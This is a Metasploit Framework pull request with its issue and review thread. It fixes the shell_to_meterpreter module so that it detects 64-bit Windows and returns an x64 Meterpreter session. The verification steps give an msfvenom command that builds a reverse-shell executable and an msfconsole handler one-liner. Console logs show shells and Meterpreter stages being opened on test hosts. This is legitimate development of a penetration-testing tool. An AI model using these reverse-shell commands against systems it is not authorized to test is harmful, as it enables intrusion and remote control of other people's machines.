### PR TITLE
fix #15856, fix shell_to_meterpreter to detect x64 windows and return an x64 meterpreter session

### LINKED ISSUE #15856: Upgrading Command Sessions on x64 Windows Returns x86 Meterpreter Sessions
## Steps to reproduce

```
        </a>[*] Command shell session 16 opened (172.20.223.94:9932 -> 172.20.211.198:51112 ) at 2021-11-10 13:43:13 -0600


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

c:\windows\system32\inetsrv>background

Background session 16? [y/N]  y 
msf6 exploit(windows/http/cve_2021_42237) > sessions

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  16        shell cmd/windows  Shell Banner: Microsoft Wind  172.20.223.94:9932 -> 172.20
                               ows [Version 10.0.14393] ---  .211.198:51112  (172.20.211.
                               --                            198)

msf6 exploit(windows/http/cve_2021_42237) > sessions -u 16
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [16]

[*] Upgrading session ID: 16
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.20.223.94:4433 
msf6 exploit(windows/http/cve_2021_42237) > 
[*] Sending stage (175174 bytes) to 172.20.211.198
[*] Meterpreter session 17 opened (172.20.223.94:4433 -> 172.20.211.198:51119 ) at 2021-11-10 13:43:41 -0600
[*] Stopping exploit/multi/handler

msf6 exploit(windows/http/cve_2021_42237) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  16        shell cmd/windows        Shell Banner: Microsoft W  172.20.223.94:9932 -> 172
                                     indows [Version 10.0.1439  .20.211.198:51112  (172.2
                                     3] -----                   0.211.198)
  17        meterpreter x86/windows  NT AUTHORITY\NETWORK SERV  172.20.223.94:4433 -> 172
                                     ICE @ WIN-86UKQGF31O1      .20.211.198:51119  (172.2
                                                                0.211.198)

msf6 exploit(windows/http/cve_2021_42237) > sessions -i 17
[*] Starting interaction with 17...

meterpreter > sysinfo
Computer        : WIN-86UKQGF31O1
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 
```

## Were you following a specific guide/tutorial or reading documentation?

Just testing exploits for module development.

## Expected behavior

When upgrading a shell session on x64 Windows a x64 Meterpreter session should be returned.

## Current behavior

A x86 Meterpreter session is returned instead of a x64 Meterpreter session.

### Metasploit version

6.1.14-dev-8cb026d3d3

### PR DESCRIPTION
**Pull request by timwr**
Quick fix for #15856 

This change means we now run `wmic os get osarchitecture` on windows shell sessions to check the arch and use the appropriate payload.

## Verification

List the steps needed to make sure this thing works

- [ ] Get an x64 or x86 windows shell session on and x64 bit WIndows OS (e.g `msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe`)
- [ ] Run the handler: `msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [ ] Ensure you have a shell session:
```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)
```
- [ ] Run `sessions -u 1`
- [ ] **Verify** you get an x64 meterpreter session

Marking this as draft as there appears to be some (tokenisation?) issues currently:
```
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Platform: Windows
[*] Upgrade payload: windows/x64/meterpreter/reverse_tcp
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.0.18:4433
[*] Transfer method: Powershell
[*] Powershell command length: 4435
[*] Cleaning up handler

[*] Waiting up to 30 seconds for the session to come back
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                               Connection
  --  ----  ----               -----------                                               ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 6.1.7601] -----  192.168.0.18:4444 -> 192.168.0.18:55146  (192.168.0.18)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----


Z:\>
Z:\>

Method invocation failed because [System.Collections.Generic.Dictionary`2[[Syst

```

### CODE REVIEW

File: modules/post/multi/manage/shell_to_meterpreter.rb [hunk 1]
```diff
@@ -78,10 +78,17 @@ def run
     case session.platform
     when 'windows', 'win'
       platform = 'windows'
-      payload_name = 'windows/meterpreter/reverse_tcp'
       lplat = [Msf::Platform::Windows]
-      larch = [ARCH_X86]
-      psh_arch = 'x86'
+      arch = cmd_exec("wmic os get osarchitecture")
```
Comment (jmartin-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb:82]: Consider using `wmic_query` from the post API https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/wmic.rb#L38

Comment (timwr) [reply modules/post/multi/manage/shell_to_meterpreter.rb:82]: wmic_query looks like it requires a meterpreter session, whereas this module takes a shell session and gives a new meterpreter session.
I could update wmic_query to work with shell sessions but it seems unnecessary/convoluted for a 1 off command.

Comment (jmartin-r7) [reply modules/post/multi/manage/shell_to_meterpreter.rb:82]: Understood, there was a note in `wmic_query` about `dont use cmd_exec as WMIC cannot be Channelized`. Might at least offer some hints related to the possible tokenization issue mentioned in the description.

Comment (jmartin-r7) [reply modules/post/multi/manage/shell_to_meterpreter.rb:82]: Consider another technique 
```
reg Query "HKLM\Hardware\Description\System\CentralProcessor\0" | find /i "x86" > NUL && set OS=32BIT || set OS=64BIT
```
 Registry checks looks to be implemented for both `meterperter` and `shell` payloads in the post API
https://github.com/rapid7/metasploit-framework/blob/77ab9be4a6319b7755f1246c9ea009a1ea6eab6e/lib/msf/core/post/windows/registry.rb.

We use this technique for VMs [here](https://github.com/rapid7/metasploit-baseline-builder/blob/master/scripts/installs/vm-guest-tools.bat).

Comment (timwr) [reply modules/post/multi/manage/shell_to_meterpreter.rb]: I don't think it matters what command I run here, as the bug still occurs regardless. Even a simple cmd_exec('echo "64-bit"') still triggers the issue.
Additionally I can reproduce the issue on master if I attempt to upgrade the same shell session twice.

I suspect the underlying issue is that on shell sessions, cmd_exec('powershell ...') commands don't actually get executed unless you press enter (a few times), e.g:


```
msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell_reverse_tcp
lhost => 127.0.0.1
lport => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 127.0.0.1:4444
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52950 ) at 2021-11-22 03:16:43 +0000

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----


C:\Windows\system32>powershell "echo fail"
powershell "echo fail"
<-- we get stuck here until I press enter

fail






C:\Windows\system32>

C:\Windows\system32>echo. | powershell "echo works"
echo. | powershell "echo works"
works

C:\Windows\system32>


```


The have_powershell command works around this by appending an `echo. |`, so I've applied the same fix here:
https://github.com/rapid7/metasploit-framework/pull/15864/commits/423810ca5cfe9c75cd5fa93b8a0c6d7eed01082b

File: modules/post/multi/manage/shell_to_meterpreter.rb [hunk 2]
```diff
@@ -78,21 +82,28 @@ def run
...
-      larch = [ARCH_X86]
-      psh_arch = 'x86'
-      vprint_status("Platform: Windows")
+      arch = cmd_exec('wmic os get osarchitecture')
+      if arch =~ /64-bit/m
+        payload_name = 'windows/x64/meterpreter/reverse_tcp'
+        larch = [ARCH_X64]
+        psh_arch = 'x64'
+      else
+        payload_name = 'windows/meterpreter/reverse_tcp'
```
Comment (gwillcox-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb:92]: What about ARM versions of Windows? Should we be taking this into account here vs just going to an x86 payload if the target is not x64?

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]
One concern here but otherwise this looks good, nice work!

File: modules/post/multi/manage/shell_to_meterpreter.rb [hunk 3]
```diff
@@ -78,21 +82,28 @@ def run
...
+        larch = [ARCH_X86]
+        psh_arch = 'x86'
+      end
```
Comment (gwillcox-r7) [inline modules/post/multi/manage/shell_to_meterpreter.rb:95]:
```suggestion
     else
         print_error('Target is running Windows on an unsupported architecture such as Windows ARM!')
         return nil
      end
```

Comment (gwillcox-r7) [reply modules/post/multi/manage/shell_to_meterpreter.rb:98]: Fixed in https://github.com/rapid7/metasploit-framework/pull/15864/commits/1b9f9f062076fa96889efac124027c75ac7c3dd2

File: modules/post/multi/manage/shell_to_meterpreter.rb (hunk 2 above)
Comment (gwillcox-r7) [reply modules/post/multi/manage/shell_to_meterpreter.rb]: Fixed in https://github.com/rapid7/metasploit-framework/pull/15864/commits/1b9f9f062076fa96889efac124027c75ac7c3dd2

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
Before:

```
msf6 payload(windows/x64/shell_bind_tcp) > generate -f exe -o raw-bind-shell.exe
[*] Writing 7168 bytes to raw-bind-shell.exe...
msf6 payload(windows/x64/shell_bind_tcp) > set RHOST 172.28.44.70
RHOST => 172.28.44.70
msf6 payload(windows/x64/shell_bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 172.28.44.70:4444
[*] Command shell session 1 opened (172.28.40.166:44485 -> 172.28.44.70:4444 ) at 2021-11-24 16:46:37 -0600

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  1         shell x64/windows  Shell Banner: Microsoft Wind  172.28.40.166:44485 -> 172.2
                               ows [Version 10.0.17763.2114  8.44.70:4444  (172.28.44.70)
                               ] -----

msf6 payload(windows/x64/shell_bind_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.40.166:4433 
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Sending stage (175174 bytes) to 172.28.44.70
[*] Meterpreter session 2 opened (172.28.40.166:4433 -> 172.28.44.70:49782 ) at 2021-11-24 16:47:22 -0600
[*] Stopping exploit/multi/handler

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell x64/windows        Shell Banner: Microsoft W  172.28.40.166:44485 -> 17
                                     indows [Version 10.0.1776  2.28.44.70:4444  (172.28.
                                     3.2114] -----              44.70)
  2         meterpreter x86/windows  DESKTOP-3GHNQ93\normal @   172.28.40.166:4433 -> 172
                                     DESKTOP-3GHNQ93            .28.44.70:49782  (172.28.
                                                                44.70)

msf6 payload(windows/x64/shell_bind_tcp) > 
```

After:

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use payload/windows/x64/shell_bind_tcp
msf6 payload(windows/x64/shell_bind_tcp) > set RHOST 172.28.44.70
RHOST => 172.28.44.70
msf6 payload(windows/x64/shell_bind_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Started bind TCP handler against 172.28.44.70:4444
[*] Command shell session 1 opened (172.28.40.166:35945 -> 172.28.44.70:4444 ) at 2021-11-24 16:50:16 -0600

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type               Information                   Connection
  --  ----  ----               -----------                   ----------
  1         shell x64/windows  Shell Banner: Microsoft Wind  172.28.40.166:35945 -> 172.2
                               ows [Version 10.0.17763.2114  8.44.70:4444  (172.28.44.70)
                               ] -----

msf6 payload(windows/x64/shell_bind_tcp) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.40.166:4433 
msf6 payload(windows/x64/shell_bind_tcp) > 
[*] Sending stage (200262 bytes) to 172.28.44.70
[*] Meterpreter session 2 opened (172.28.40.166:4433 -> 172.28.44.70:49786 ) at 2021-11-24 16:50:36 -0600
[*] Stopping exploit/multi/handler

msf6 payload(windows/x64/shell_bind_tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         shell x64/windows        Shell Banner: Microsoft W  172.28.40.166:35945 -> 17
                                     indows [Version 10.0.1776  2.28.44.70:4444  (172.28.
                                     3.2114] -----              44.70)
  2         meterpreter x64/windows  DESKTOP-3GHNQ93\normal @   172.28.40.166:4433 -> 172
                                     DESKTOP-3GHNQ93            .28.44.70:49786  (172.28.
                                                                44.70)

msf6 payload(windows/x64/shell_bind_tcp) > 
```

**Comment by gwillcox-r7** [comment]
Landing now

**Comment by gwillcox-r7** [comment]
# Release Notes
A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.

**Pull request merged**